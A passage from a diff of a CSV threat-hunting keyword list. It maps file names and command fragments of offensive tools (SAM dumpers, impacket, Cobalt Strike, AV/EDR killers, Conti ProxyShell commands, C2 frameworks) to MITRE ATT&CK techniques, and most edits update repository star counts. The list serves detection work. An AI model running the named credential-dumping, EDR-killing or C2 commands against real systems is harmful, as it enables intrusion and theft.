Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*samdump.zip*","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" @@ -16141,94 +16323,94 @@ "*samdump2.c*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*sample_brc4.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*samr_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*samratashok/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*samrdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*samratashok/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*samrdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*sandboxevasion.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" "*SAP_GW_RCE_exploit*","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","2","145","48","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z" -"*sap2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*SauronEye.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sc create plumber*warpzoneclient*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*sap2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*SauronEye.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sc create plumber*warpzoneclient*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*sc create Terminator *.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" -"*sc delete plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*sc delete plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sc_inject_direct.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc_inject_indirect.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc0tfree*","offensive_tool_keyword","Github Username","github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. Senior Security Consultant @ctxis hosting offensve tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sc0tfree","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*scada_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*scan -T list_of_targets.txt*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*scan4all -*.xml*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all -h*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all -tp *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all.51pwn.com*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_linux_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_macOS_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_macOS_arm64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_windows_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_windows_386.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_windows_amd64.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all-main*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scada_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*scan -T list_of_targets.txt*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*scan4all -*.xml*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all -h*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all -tp *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all.51pwn.com*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_linux_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_macOS_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_macOS_arm64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_windows_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_windows_386.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_windows_amd64.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all-main*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*scanless*","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Information Gathering","https://github.com/vesche/scanless","1","0","N/A","N/A","10","1073","176","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z" -"*scanner/backdoor*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*scanner/backdoor*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*scannerport.go -*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" -"*Scanners-Box*","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7644","2353","2023-08-09T07:09:32Z","2016-12-24T16:07:50Z" +"*Scanners-Box*","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7647","2353","2023-08-09T07:09:32Z","2016-12-24T16:07:50Z" "*ScanProcessForBadgerConfig*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ScanTCPImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*ScareCrow *-loader *","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense 